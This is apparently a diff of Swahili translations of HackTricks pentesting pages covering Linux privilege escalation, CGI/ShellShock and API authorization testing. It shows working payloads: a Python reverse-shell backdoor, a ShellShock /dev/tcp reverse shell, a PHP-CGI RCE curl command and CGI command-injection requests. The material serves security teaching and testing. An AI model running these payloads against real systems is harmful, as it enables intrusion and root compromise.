+Unapaswa pia kuangalia faili zenye neno "**password**" katika **jina** au ndani ya **maudhui**, na pia angalia IPs na emails ndani ya logs, au hashes regexps.\
+Sitaorodhesha hapa jinsi ya kufanya yote haya, lakini ikiwa una nia unaweza kuangalia ukaguzi wa mwisho ambao [**linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh) hufanya.
 
-## Faili zinazoweza kuandikwa
+## Writable files
 
 ### Python library hijacking
 
-Kama unajua kutoka **wapi** script ya python itaendeshwa na unaweza **kuandika ndani ya** folda hiyo au unaweza **kuhariri python libraries**, unaweza kubadilisha OS library na kuiweka backdoor (ikiwa unaweza kuandika mahali script ya python itaendeshwa, nakili na weka os.py library).
+Ikiwa unajua kutoka **wapi** script ya python itaendeshwa na unaweza **kuandika ndani** ya folda hiyo au unaweza **kuhariri maktaba za python**, unaweza kubadilisha maktaba ya OS na kuiweka backdoor (kama unaweza kuandika mahali script ya python itaendeshwa, nakili na ubandike maktaba os.py).
 
-Ili **backdoor the library**, ongeza tu mwishoni mwa os.py library mstari ufuatao (badilisha IP na PORT):
+Ili **backdoor the library** ongeza tu mwishoni mwa maktaba os.py mstari ufuatao (badilisha IP na PORT):
 ```python
 import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.14",5678));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
 ```
 ### Logrotate exploitation
 
-Udhaifu katika `logrotate` unamruhusu mtumiaji mwenye **write permissions** kwenye faili la logi au kwenye saraka zake za mzazi kupata kwa namna inayowezekana kupandishwa kwa ruhusa. Hii ni kwa sababu `logrotate`, mara nyingi ikiwa inakimbia kama **root**, inaweza kudhibitiwa ili iendeshe faili zozote, hasa katika saraka kama _**/etc/bash_completion.d/**_. Ni muhimu kukagua ruhusa si tu katika _/var/log_ bali pia katika saraka yoyote ambapo rotation ya logi inafanywa.
+Udhaifu katika `logrotate` unawawezesha watumiaji wenye **write permissions** kwenye faili ya logi au saraka zake za juu kupata ruhusa za juu. Hii ni kwa sababu `logrotate`, mara nyingi ikifanya kazi kama **root**, inaweza kudanganywa ili kuendesha faili zozote, hasa katika saraka kama _**/etc/bash_completion.d/**_. Ni muhimu kukagua ruhusa sio tu katika _/var/log_ bali pia katika saraka yoyote ambapo log rotation inatumika.
 
 > [!TIP]
-> Udhaifu huu unaathiri `logrotate` toleo `3.18.0` na zile za zamani
+> Udhaifu huu unaathiri `logrotate` version `3.18.0` and older
 
-Maelezo ya kina kuhusu udhaifu yanaweza kupatikana kwenye ukurasa huu: [https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition](https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition).
+Maelezo zaidi kuhusu udhaifu yanaweza kupatikana kwenye ukurasa huu: [https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition](https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition).
 
-Unaweza kumanfaatkan udhaifu huu kwa kutumia [**logrotten**](https://github.com/whotwagner/logrotten).
+Unaweza kutumia udhaifu huu kwa kutumia [**logrotten**](https://github.com/whotwagner/logrotten).
 
-Udhaifu huu ni sawa sana na [**CVE-2016-1247**](https://www.cvedetails.com/cve/CVE-2016-1247/) **(nginx logs),** hivyo kila unapogundua unaweza kubadilisha logs, angalia ni nani anasimamia logs hizo na angalia kama unaweza kupandisha ruhusa kwa kuchukua nafasi ya logs kwa symlinks.
+Udhaifu huu ni sawa sana na [**CVE-2016-1247**](https://www.cvedetails.com/cve/CVE-2016-1247/) **(nginx logs),** hivyo kila unapogundua unaweza kubadilisha logs, angalia nani anasimamia logs hizo na angalia kama unaweza kupata ruhusa za juu kwa kubadilisha logs kuwa symlinks.
 
 ### /etc/sysconfig/network-scripts/ (Centos/Redhat)
 
 **Vulnerability reference:** [**https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f**](https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f)
 
-Ikiwa, kwa sababu yoyote ile, mtumiaji anaweza **kuandika** script ya `ifcf-<whatever>` kwenye _/etc/sysconfig/network-scripts_ **au** anaweza **kurekebisha** ile iliyopo, basi mfumo wako ume-pwned.
+Ikiwa, kwa sababu yoyote, mtumiaji anaweza kuandika script ya `ifcf-<whatever>` katika _/etc/sysconfig/network-scripts_ au kurekebisha ile iliyopo, basi **system yako is pwned**.
 
-Network scripts, _ifcg-eth0_ kwa mfano, hutumika kwa muunganisho wa network. Zinataonekana kabisa kama faili za .INI. Hata hivyo, zinakuwa \~sourced\~ kwenye Linux na Network Manager (dispatcher.d).
+Network scripts, _ifcg-eth0_ kwa mfano hutumika kwa miunganisho ya mtandao. Zinatafutwa sawasawa na .INI files. Hata hivyo, zinakuwa ~sourced~ kwenye Linux na Network Manager (dispatcher.d).
 
-Katika kesi yangu, thamani ya `NAME=` katika network scripts hizi haishughulikiwi vizuri. Ikiwa una **nafasi tupu** ndani ya jina mfumo hujaribu kutekeleza sehemu baada ya nafasi hiyo. Hii inamaanisha kuwa **kila kitu kilicho baada ya nafasi ya kwanza kinakimbizwa kama root**.
+Katika kesi yangu, thamani ya `NAME=` iliyowekwa katika scripts hizi za mtandao haiendeshwi ipasavyo. Ikiwa jina lina nafasi tupu/blank mfumo hujaribu kutekeleza sehemu iliyofuata nafasi hiyo. Hii ina maana kwamba **kila kitu kinachofuata nafasi ya kwanza kinatekelezwa kama root**.
 
 Kwa mfano: _/etc/sysconfig/network-scripts/ifcfg-1337_
 ```bash
@@ -1451,13 +1448,13 @@ DEVICE=eth0
 ```
 (_Kumbuka nafasi tupu kati ya Network na /bin/id_)
 
-### **init, init.d, systemd, and rc.d**
+### **init, init.d, systemd, na rc.d**
 
-Directory `/etc/init.d` ni nyumbani kwa **scripts** za System V init (SysVinit), **classic Linux service management system**. Inajumuisha scripts za `start`, `stop`, `restart`, na wakati mwingine `reload` services. Hizi zinaweza kutekelezwa moja kwa moja au kupitia symbolic links zilizo kwenye `/etc/rc?.d/`. Njia mbadala kwenye Redhat systems ni `/etc/rc.d/init.d`.
+The directory `/etc/init.d` is home to **scripts** for System V init (SysVinit), the **classic Linux service management system**. It includes scripts to `start`, `stop`, `restart`, and sometimes `reload` services. These can be executed directly or through symbolic links found in `/etc/rc?.d/`. An alternative path in Redhat systems is `/etc/rc.d/init.d`.
 
-Kwa upande mwingine, `/etc/init` inahusishwa na **Upstart**, mfumo mpya wa **service management** ulioanzishwa na Ubuntu, unaotumia faili za configuration kwa kazi za usimamizi wa services. Licha ya mabadiliko kwenda Upstart, SysVinit scripts bado zinatumiwa pamoja na Upstart configurations kutokana na compatibility layer ndani ya Upstart.
+Kwa upande mwingine, `/etc/init` inahusishwa na **Upstart**, mfumo mpya wa **service management** uliotangazwa na Ubuntu, unaotumia mafaili ya configuration kwa shughuli za usimamizi wa service. Licha ya mabadiliko kuelekea Upstart, script za SysVinit bado zinatumika pamoja na configuration za Upstart kwa sababu ya safu ya ulinganifu ndani ya Upstart.
 
-**systemd** inatokea kama mfumo wa kisasa wa initialization na service manager, ukitoa vipengele vya juu kama on-demand daemon starting, automount management, na system state snapshots. Inaweka faili kwenye `/usr/lib/systemd/` kwa ajili ya distribution packages na `/etc/systemd/system/` kwa ajili ya administrator modifications, ikirahisisha mchakato wa usimamizi wa system.
+**systemd** emerges as a modern initialization and service manager, offering advanced features such as on-demand daemon starting, automount management, and system state snapshots. It organizes files into `/usr/lib/systemd/` for distribution packages and `/etc/systemd/system/` for administrator modifications, streamlining the system administration process.
 
 ## Mbinu Nyingine
 
@@ -1484,7 +1481,7 @@ cisco-vmanage.md
 
 ## Android rooting frameworks: manager-channel abuse
 
-Android rooting frameworks mara nyingi hu-hook syscall ili kufichua privileged kernel functionality kwa userspace manager. Udhibitishaji dhaifu wa manager (mfano, signature checks based on FD-order au poor password schemes) unaweza kumuwezesha local app kujifanya manager na escalate to root kwenye devices ambazo tayari zime-rooted. Jifunze zaidi na maelezo ya exploitation hapa:
+Android rooting frameworks commonly hook a syscall to expose privileged kernel functionality to a userspace manager. Weak manager authentication (e.g., signature checks based on FD-order or poor password schemes) can enable a local app to impersonate the manager and escalate to root on already-rooted devices. Jifunze zaidi na maelezo ya exploitation hapa:
 
 
 {{#ref}}
@@ -1493,15 +1490,15 @@ android-rooting-frameworks-manager-auth-bypass-syscall-hook.md
 
 ## VMware Tools service discovery LPE (CWE-426) via regex-based exec (CVE-2025-41244)
 
-Regex-driven service discovery katika VMware Tools/Aria Operations inaweza kutoa binary path kutoka kwenye process command lines na kuiendesha na -v chini ya privileged context. Patterns zinazoruhusu (mfano, using \S) zinaweza kumfananisha listener aliyestaged na mshambuliaji katika writable locations (mfano, /tmp/httpd), zikisababisha execution kama root (CWE-426 Untrusted Search Path).
+Regex-driven service discovery in VMware Tools/Aria Operations can extract a binary path from process command lines and execute it with -v under a privileged context. Permissive patterns (e.g., using \S) may match attacker-staged listeners in writable locations (e.g., /tmp/httpd), leading to execution as root (CWE-426 Untrusted Search Path).
 
-Jifunze zaidi na uone generalized pattern inayoweza kutumika kwa discovery/monitoring stacks nyingine hapa:
+Jifunze zaidi na ona pattern jumla inayoweza kutumika kwa discovery/monitoring stacks nyingine hapa:
 
 {{#ref}}
 vmware-tools-service-discovery-untrusted-search-path-cve-2025-41244.md
 {{#endref}}
 
-## Kernel Security Protections
+## Ulinzi wa Usalama wa Kernel
 
 - [https://github.com/a13xp0p0v/kconfig-hardened-check](https://github.com/a13xp0p0v/kconfig-hardened-check)
 - [https://github.com/a13xp0p0v/linux-kernel-defence-map](https://github.com/a13xp0p0v/linux-kernel-defence-map)
diff --git a/src/network-services-pentesting/pentesting-web/cgi.md b/src/network-services-pentesting/pentesting-web/cgi.md
index 0e5d60364..44d748fd0 100644
--- a/src/network-services-pentesting/pentesting-web/cgi.md
+++ b/src/network-services-pentesting/pentesting-web/cgi.md
@@ -3,22 +3,22 @@
 {{#include ../../banners/hacktricks-training.md}}
 
 
-## Maelezo
+## Taarifa
 
-The **CGI scripts are perl scripts**, hivyo, ikiwa ume-compromise server inayoweza kutekeleza _**.cgi**_ scripts unaweza **kupakia perl reverse shell** \(`/usr/share/webshells/perl/perl-reverse-shell.pl`\), **kubadilisha extension** kutoka **.pl** hadi **.cgi**, kutoa **execute permissions** \(`chmod +x`\) na **kupata** reverse shell **kutoka kwenye web browser** ili kuitekeleza.
-Ili kujaribu **CGI vulns** inashauriwa kutumia `nikto -C all` \(and all the plugins\)
+The **CGI scripts are perl scripts**, hivyo, ikiwa umepata udhibiti wa server inayoweza kutekeleza _**.cgi**_ scripts unaweza **kupakia a perl reverse shell** \(`/usr/share/webshells/perl/perl-reverse-shell.pl`\), **kubadilisha extension** kutoka **.pl** hadi **.cgi**, kumpa **execute permissions** \(`chmod +x`\) na **kupata** reverse shell **kutoka kwa web browser** ili kuitekeleza.
+Ili kujaribu kwa **CGI vulns** inashauriwa kutumia `nikto -C all` \(na plugins zote\)
 
 ## **ShellShock**
 
-**ShellShock** ni udhaifu unaoathiri kwa kiasi kikubwa **Bash** command-line shell katika mifumo ya uendeshaji inayotegemea Unix. Unalenga uwezo wa Bash wa kuendesha amri zinazotumwa na applications. Udhaifu upo katika udhibiti wa **environment variables**, ambazo ni thamani zilizopewa majina zinazoendelea (dynamic) ambazo huathiri jinsi michakato inavyotekelezwa kwenye kompyuta. Washambuliaji wanaweza kutumia hili kwa kuambatisha **malicious code** kwenye environment variables, ambayo itaendeshwa wakati variable inapopokelewa. Hii inawawezesha washambuliaji ku-compromise mfumo.
+**ShellShock** ni **vulnerability** inayogusa shell ya amri inayotumika sana **Bash** katika mifumo ya uendeshaji ya Unix-based. Inalenga uwezo wa Bash kutekeleza amri zinazopitishwa na applications. Udhaifu uko katika udhibiti wa **environment variables**, ambazo ni thamani zilizopewa majina zinazobadilika na zinaathiri jinsi process zinavyotekelezwa kwenye kompyuta. Washambuliaji wanaweza kutengeneza udhaifu huu kwa kuambatanisha **msimbo hatari** kwenye environment variables, ambao hutekelezwa wakati variable inapopokelewa. Hii inamruhusu mshambuliaji kuathiri mfumo.
 
-Kutumia udhaifu huu, **ukurasa unaweza kurudisha kosa**.
+Kwa kutumia udhaifu huu **ukurasa unaweza kurudisha kosa**.
 
-Unaweza **kupata** udhaifu huu ukiangalia kuwa unatumia **old Apache version** na **cgi_mod** \(with cgi folder\) au kwa kutumia **nikto**.
+Unaweza **kupata** udhaifu huu kwa kuona kuwa inatumia **old Apache version** na **cgi_mod** \(na cgi folder\) au kwa kutumia **nikto**.
 
-### **Jaribu**
+### **Test**
 
-Vipimo vingi vinategemea ku-echo kitu na kutegemea kwamba mnyororo huo utarudishwa katika majibu ya wavuti. Ikiwa unaamini ukurasa unaweza kuwa dhaifu, tafuta kurasa zote za cgi na uziteste.
+Mitihani mingi inategemea kutoa echo ya kitu na kutarajia kwamba mnyororo huo urudi katika response ya web. Ikiwa unadhani ukurasa unaweza kuwa vulnerable, tafuta kurasa zote za cgi na zipime.
 
 **Nmap**
 ```bash
@@ -51,17 +51,17 @@ curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.11.0.41/80 0>&1' htt
 > set rhosts 10.1.2.11
 > run
 ```
-## Dispatchers za CGI zilizo katikati (routing ya endpoint moja kupitia selector parameters)
+## Wasambazaji wa CGI waliowekwa kati (single endpoint routing via selector parameters)
 
-Mengi ya embedded web UIs huweka pamoja (multiplex) vitendo vingi vyenye ruhusa nyuma ya endpoint moja ya CGI (kwa mfano, `/cgi-bin/cstecgi.cgi`) na hutumia selector parameter kama `topicurl=<handler>` ku-routing ombi kwa function ya ndani.
+UI nyingi za wavuti zilizojengewa ndani huunganisha vitendo vingi vyenye ruhusa nyuma ya single CGI endpoint (kwa mfano, `/cgi-bin/cstecgi.cgi`) na hutumia selector parameter kama `topicurl=<handler>` kupeleka ombi kwa kazi ya ndani.
 
-Mbinu za ku-exploit routers hizi:
+Mbinu za kuchukua faida ya router hizi:
 
-- Enumerate handler names: scrape JS/HTML, brute-force with wordlists, au unpack firmware na grep kwa handler strings zinazotumika na dispatcher.
-- Test unauthenticated reachability: baadhi ya handlers husahau auth checks na zinaweza kupatikana moja kwa moja.
-- Focus on handlers that invoke system utilities or touch files; weak validators often only block a few characters and might miss the leading hyphen `-`.
+- Orodhesha majina ya handler: scrape JS/HTML, brute-force kwa wordlists, au unpack firmware na grep kwa handler strings zinazotumiwa na dispatcher.
+- Jaribu ufikikaji bila uthibitisho (unauthenticated reachability): baadhi ya handlers huzisahau cheki za auth na zinaweza kuitwa moja kwa moja.
+- Lenga handlers zinazowaita system utilities au kugusa files; validators dhaifu mara nyingi huwazuia herufi chache tu na huenda ikakosa hyphen ya mwanzoni `-`.
 
-Generic exploit shapes:
+Aina za generic exploit:
 ```http
 POST /cgi-bin/cstecgi.cgi HTTP/1.1
 Content-Type: application/x-www-form-urlencoded
@@ -75,30 +75,29 @@ topicurl=setEasyMeshAgentCfg&agentName=;id;
 # 3) Validator bypass → arbitrary file write in file-touching handlers
 topicurl=setWizardCfg&<crafted_fields>=/etc/init.d/S99rc
 ```
-Detection and hardening:
+Utambuzi na kuimarisha usalama:
 
-- Angalia ombi zisizo za kuthibitishwa kwa centralized CGI endpoints zikiwa na `topicurl` imewekwa kwa sensitive handlers.
-- Flag vigezo vinavyoanza na `-` (argv option injection attempts).
-- Wauzaji: lazimisha authentication kwa state-changing handlers zote, validate kwa kutumia strict allowlists/types/lengths, na kamwe usipitishe user-controlled strings kama command-line flags.
+- Angalia maombi yasiyo na uthibitisho kwa endpoints za CGI za kati na `topicurl` imewekwa kwa handlers nyeti.
+- Tambua vigezo vinavyoanza na `-` (jaribio la argv option injection).
+- Wauzaji: weka uthibitisho kwa handlers zote zinazobadilisha state, thibitisha kwa kutumia allowlists/aina/urefu kali, na kamwe usipitishe nyuzi zilizo chini ya udhibiti wa mtumiaji kama command-line flags.
 
 ## PHP ya zamani + CGI = RCE \(CVE-2012-1823, CVE-2012-2311\)
 
-Kwa ujumla, ikiwa cgi imewezeshwa na php ni "old" \(&lt;5.3.12 / &lt; 5.4.2\) unaweza execute code.
-Ili exploit ugani huu unahitaji kufikia faili fulani ya PHP ya web server bila kutuma parameters \(hasa bila kutuma tabia "="\).
-Kisha, kwa kujaribu ugani huu, unaweza kufikia kwa mfano `/index.php?-s` \(tazama `-s`\) na **source code ya application itaonekana katika response**.
+Kwa kifupi, ikiwa cgi iko active na php ni "old" \(&lt;5.3.12 / &lt; 5.4.2\) unaweza execute code.
+Ili ku-exploit hii vulnerability unahitaji kufikia baadhi ya faili za PHP za web server bila kutuma parameters \(hasa bila kutuma tabia "="\).
+Kisha, ili kujaribu hii vulnerability, unaweza kufikia kwa mfano `/index.php?-s` \(angalia `-s`\) na **source code ya application itaonekana kwenye response**.
 
-Kisha, ili kupata **RCE** unaweza kutuma query maalum: `/?-d allow_url_include=1 -d auto_prepend_file=php://input` na **PHP code** itakayotekelezwa iko katika **body ya request**.
-Example:
+Kisha, ili kupata **RCE** unaweza kutuma query maalum: `/?-d allow_url_include=1 -d auto_prepend_file=php://input` na **PHP code** itakayotekelezwa iko katika **mwili wa request. Mfano:**
 ```bash
 curl -i --data-binary "<?php system(\"cat /flag.txt \") ?>" "http://jh2i.com:50008/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input"
 ```
-**Taarifa zaidi kuhusu vuln na exploits zinazowezekana:** [**https://www.zero-day.cz/database/337/**](https://www.zero-day.cz/database/337/)**,** [**cve-2012-1823**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1823)**,** [**cve-2012-2311**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2311)**,** [**CTF Writeup Example**](https://github.com/W3rni0/HacktivityCon_CTF_2020#gi-joe)**.**
+**Taarifa zaidi kuhusu vuln na possible exploits:** [**https://www.zero-day.cz/database/337/**](https://www.zero-day.cz/database/337/)**,** [**cve-2012-1823**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1823)**,** [**cve-2012-2311**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2311)**,** [**CTF Writeup Example**](https://github.com/W3rni0/HacktivityCon_CTF_2020#gi-joe)**.**
 
 ## **Proxy \(MitM to Web server requests\)**
 
-CGI inaunda environment variable kwa kila header katika http request. Kwa mfano: "host:web.com" inaundwa kama "HTTP_HOST"="web.com"
+CGI huunda variable ya mazingira kwa kila header katika http request. Kwa mfano: "host:web.com" huundwa kama "HTTP_HOST"="web.com"
 
-Kwa kuwa HTTP_PROXY variable inaweza kutumika na web server. Jaribu kutuma **header** inayoonyesha: "**Proxy: &lt;IP_attacker&gt;:&lt;PORT&gt;**". Ikiwa server itafanya ombi lolote wakati wa session, utaweza kunasa kila ombi litakalo fanywa na server.
+Kwa kuwa variable ya HTTP_PROXY inaweza kutumika na web server. Jaribu kutuma **header** yenye: "**Proxy: &lt;IP_attacker&gt;:&lt;PORT&gt;**" na ikiwa server itafanya ombi lolote wakati wa session, utaweza kunasa kila ombi linalofanywa na server.
 
 ## **Marejeo**
 
diff --git a/src/network-services-pentesting/pentesting-web/web-api-pentesting.md b/src/network-services-pentesting/pentesting-web/web-api-pentesting.md
index 604ddaabc..52828f5ff 100644
--- a/src/network-services-pentesting/pentesting-web/web-api-pentesting.md
+++ b/src/network-services-pentesting/pentesting-web/web-api-pentesting.md
@@ -2,54 +2,96 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## API Pentesting Methodology Summary
+## Muhtasari wa Mbinu za API Pentesting
 
-Pentesting APIs inahusisha njia iliyopangwa ya kugundua udhaifu. Mwongo huu unajumuisha mbinu kamili, ukisisitiza mbinu na zana za vitendo.
+Pentesting APIs inahitaji mbinu iliyo na muundo ili kubaini udhaifu. Mwongozo huu unafupisha mbinu kamili, ukisisitiza mbinu za vitendo na zana.
 
-### **Understanding API Types**
+### **Kuelewa Aina za API**
 
-- **SOAP/XML Web Services**: Tumia muundo wa WSDL kwa ajili ya nyaraka, mara nyingi hupatikana kwenye njia za `?wsdl`. Zana kama **SOAPUI** na **WSDLer** (Burp Suite Extension) ni muhimu kwa ajili ya kuchambua na kuunda maombi. Mfano wa nyaraka unapatikana kwenye [DNE Online](http://www.dneonline.com/calculator.asmx).
-- **REST APIs (JSON)**: Nyaraka mara nyingi zinakuja katika faili za WADL, lakini zana kama [Swagger UI](https://swagger.io/tools/swagger-ui/) zinatoa kiolesura rahisi zaidi kwa ajili ya mwingiliano. **Postman** ni zana muhimu kwa ajili ya kuunda na kusimamia maombi ya mfano.
-- **GraphQL**: Lugha ya kuhoji kwa APIs inatoa maelezo kamili na yanayoeleweka kuhusu data katika API yako.
+- **SOAP/XML Web Services**: Tumia format ya WSDL kwa dokumenti, kawaida hupatikana kwenye path za `?wsdl`. Zana kama **SOAPUI** na **WSDLer** (Burp Suite Extension) ni muhimu kwa kusoma na kuunda requests. Mfano wa dokumenti upo kwenye [DNE Online](http://www.dneonline.com/calculator.asmx).
+- **REST APIs (JSON)**: Dokumenti mara nyingi hutolewa kama faili za WADL, lakini zana kama [Swagger UI](https://swagger.io/tools/swagger-ui/) zinatoa interface rahisi kwa kuingiliana. **Postman** ni zana muhimu kwa kuunda na kusimamia mifano ya requests.
+- **GraphQL**: Lugha ya query kwa APIs inayotoa maelezo kamili na yanayoweza kueleweka ya data iliyopo kwenye API yako.
 
-### **Practice Labs**
+### **Maabara za Mazoezi**
 
-- [**VAmPI**](https://github.com/erev0s/VAmPI): API yenye udhaifu wa makusudi kwa ajili ya mazoezi ya vitendo, ikifunika udhaifu wa juu 10 wa API wa OWASP.
+- [**VAmPI**](https://github.com/erev0s/VAmPI): API iliyoundwa kwa makusudi kuwa na udhaifu kwa mazoezi ya vitendo, ikifunika OWASP top 10 API vulnerabilities.
 
-### **Effective Tricks for API Pentesting**
+### **Mbinu Madhubuti za API Pentesting**
 
-- **SOAP/XML Vulnerabilities**: Chunguza udhaifu wa XXE, ingawa matangazo ya DTD mara nyingi yanapigwa marufuku. Mifumo ya CDATA inaweza kuruhusu kuingiza payload ikiwa XML inabaki kuwa halali.
-- **Privilege Escalation**: Jaribu mwisho wa huduma zenye viwango tofauti vya ruhusa ili kubaini uwezekano wa ufikiaji usioidhinishwa.
-- **CORS Misconfigurations**: Chunguza mipangilio ya CORS kwa uwezekano wa kutumiwa kupitia mashambulizi ya CSRF kutoka kwa vikao vilivyoidhinishwa.
-- **Endpoint Discovery**: Tumia mifumo ya API kugundua mwisho wa huduma zilizofichwa. Zana kama fuzzers zinaweza kuharakisha mchakato huu.
-- **Parameter Tampering**: Jaribu kuongeza au kubadilisha vigezo katika maombi ili kufikia data au kazi zisizoidhinishwa.
-- **HTTP Method Testing**: Badilisha mbinu za maombi (GET, POST, PUT, DELETE, PATCH) ili kugundua tabia zisizotarajiwa au ufichuzi wa taarifa.
-- **Content-Type Manipulation**: Badilisha kati ya aina tofauti za maudhui (x-www-form-urlencoded, application/xml, application/json) ili kujaribu matatizo ya uchambuzi au udhaifu.
-- **Advanced Parameter Techniques**: Jaribu na aina zisizotarajiwa za data katika payloads za JSON au cheza na data za XML kwa ajili ya XXE injections. Pia, jaribu uchafuzi wa vigezo na wahusika wa wildcard kwa ajili ya majaribio mapana.
-- **Version Testing**: Toleo la zamani la API linaweza kuwa na uwezekano mkubwa wa kushambuliwa. Daima angalia na jaribu dhidi ya matoleo mengi ya API.
+- **SOAP/XML Vulnerabilities**: Chunguza XXE vulnerabilities, ingawa DTD declarations mara nyingi huwekewa vizuizi. CDATA tags zinaweza kuruhusu kuingiza payload ikiwa XML inabaki kuwa halali.
+- **Privilege Escalation**: Jaribu endpoints kwa viwango tofauti vya vibali ili kubaini uwezekano wa ufikiaji usioidhinishwa.
+- **CORS Misconfigurations**: Chunguza mipangilio ya CORS kwa uwezekano wa kutumiwa kupitia CSRF attacks kutoka kwa session zilizo authenticate-ikiwa.
+- **Endpoint Discovery**: Tumia pattern za API kugundua endpoints zilizofichwa. Zana kama fuzzers zinaweza kuendesha mchakato huu kiotomatiki.
+- **Parameter Tampering**: Jaribu kuongeza au kubadilisha parameters katika requests ili kupata data au functionalities zisizoidhinishwa.
+- **HTTP Method Testing**: Badilisha methods za request (GET, POST, PUT, DELETE, PATCH) ili kugundua tabia zisizotarajiwa au ufunuo wa taarifa.
+- **Content-Type Manipulation**: Badilisha kati ya content types tofauti (x-www-form-urlencoded, application/xml, application/json) kujaribu masuala ya parsing au udhaifu.
+- **Advanced Parameter Techniques**: Jaribu aina za data zisizotarajiwa katika JSON payloads au cheza na data za XML kwa XXE injections. Pia, jaribu parameter pollution na wildcard characters kwa upimaji mpana.
+- **Version Testing**: Toleo za zamani za API zinaweza kuwa nyeti zaidi kwa mashambulizi. Daima angalia na upime dhidi ya matoleo mengi ya API.
 
-### **Tools and Resources for API Pentesting**
+### Authorization & Business Logic (AuthN != AuthZ) — tRPC/Zod protectedProcedure pitfalls
 
-- [**kiterunner**](https://github.com/assetnote/kiterunner): Nzuri kwa ajili ya kugundua mwisho wa API. Tumia kuangalia na kujaribu nguvu njia na vigezo dhidi ya APIs lengwa.
+Stack za kisasa za TypeScript mara nyingi hutumia tRPC pamoja na Zod kwa validation ya input. Katika tRPC, `protectedProcedure` kawaida inahakikisha request ina session halali (authentication) lakini haimaanishi mwito una haki ya role/vipengele (authorization). Mchanganyiko huu unaweza kusababisha Broken Function Level Authorization/BOLA ikiwa procedures nyeti zimefungwa tu kwa `protectedProcedure`.
+
+- Threat model: Mtumiaji yeyote aliye authenticate lakini mwenye vibali vya chini anaweza kusababisha procedures za daraja la admin ikiwa ukaguzi wa role haupo (mfano, background migrations, feature flags, tenant-wide maintenance, job control).
+- Black-box signal: `POST /api/trpc/<router>.<procedure>` endpoints ambazo zinafanikiwa kwa akaunti za kawaida wakati zinapaswa kuwa kwa admin tu. Self-serve signups huongeza kwa kiasi kikubwa uwezekano wa kutumika.
+- Typical tRPC route shape (v10+): JSON body imefungwa chini ya `{"input": {...}}`.
+
+Example vulnerable pattern (no role/permission gate):
+```ts
+// The endpoint for retrying a migration job
+// This checks for a valid session (authentication)
+retry: protectedProcedure
+// but not for an admin role (authorization).
+.input(z.object({ name: z.string() }))
+.mutation(async ({ input, ctx }) => {
+// Logic to restart a sensitive migration
+}),
+```
+Utekelezaji wa vitendo (black-box)
+
+1) Sajili akaunti ya kawaida na upate sesi iliyothibitishwa (cookies/headers).
+2) Orodhesha background jobs au rasilimali nyeti kupitia taratibu za “list”/“all”/“status”.
+```bash
+curl -s -X POST 'https://<tenant>/api/trpc/backgroundMigrations.all' \
+-H 'Content-Type: application/json' \
+-b '<AUTH_COOKIES>' \
+--data '{"input":{}}'
+```
+3) Tekeleza vitendo vya kibali kama kuanzisha upya job:
+```bash
+curl -s -X POST 'https://<tenant>/api/trpc/backgroundMigrations.retry' \
+-H 'Content-Type: application/json' \
+-b '<AUTH_COOKIES>' \
+--data '{"input":{"name":"<migration_name>"}}'
+```
+Impact to assess
+
+- Uharibifu wa data kutokana na uanzishaji upya usio-idempotent: Kuamsha utekelezaji sambamba wa migrations/workers kunaweza kusababisha race conditions na hali zisizoendelevu kwa sehemu (kupotea kwa data bila ishara, analytics zilizoharibika).
+- DoS via worker/DB starvation: Kurudia kuanzisha kazi nzito kunaweza kuchosha worker pools na muunganisho wa database, kusababisha kuzimwa kwa huduma kwa wapangaji wote.
+
+### **Vifaa na Rasilimali kwa API Pentesting**
+
+- [**kiterunner**](https://github.com/assetnote/kiterunner): Inafaa sana kwa kugundua API endpoints. Itumie kufanya scan na brute force paths na parameters dhidi ya API lengwa.
 ```bash
 kr scan https://domain.com/api/ -w routes-large.kite -x 20
 kr scan https://domain.com/api/ -A=apiroutes-220828 -x 20
 kr brute https://domain.com/api/ -A=raft-large-words -x 20 -d=0
 kr brute https://domain.com/api/ -w /tmp/lang-english.txt -x 20 -d=0
 ```
-- [**https://github.com/BishopFox/sj**](https://github.com/BishopFox/sj): sj ni zana ya mistari ya amri iliyoundwa kusaidia katika ukaguzi wa **faili za ufafanuzi za Swagger/OpenAPI zilizofichuliwa** kwa kuangalia mwisho wa API zinazohusiana kwa uthibitisho dhaifu. Pia inatoa templeti za amri kwa ajili ya kupima udhaifu kwa mikono.
-- Zana za ziada kama **automatic-api-attack-tool**, **Astra**, na **restler-fuzzer** zinatoa kazi maalum za kupima usalama wa API, kuanzia simulating shambulio hadi fuzzing na skanning ya udhaifu.
-- [**Cherrybomb**](https://github.com/blst-security/cherrybomb): Ni zana ya usalama wa API inayokagua API yako kulingana na faili ya OAS (zana hiyo imeandikwa kwa rust).
+- [**https://github.com/BishopFox/sj**](https://github.com/BishopFox/sj): sj ni zana ya mstari wa amri iliyoundwa kusaidia ukaguzi wa **faili za ufafanuzi za Swagger/OpenAPI zilizo wazi** kwa kukagua API endpoints zinazohusiana kwa uthibitishaji dhaifu. Pia hutoa templates za amri kwa ajili ya upimaji wa udhaifu kwa mkono.
+- Zana nyingine kama **automatic-api-attack-tool**, **Astra**, na **restler-fuzzer** zinatoa vipengele vilivyobinafsishwa kwa ajili ya upimaji wa usalama wa API, kuanzia kuiga mashambulizi hadi fuzzing na uchunguzi wa udhaifu.
+- [**Cherrybomb**](https://github.com/blst-security/cherrybomb): Ni zana ya usalama ya API inayokagua API yako kwa msingi wa faili ya OAS (zana imeandikwa kwa Rust).
 
 ### **Rasilimali za Kujifunza na Mazoezi**
 
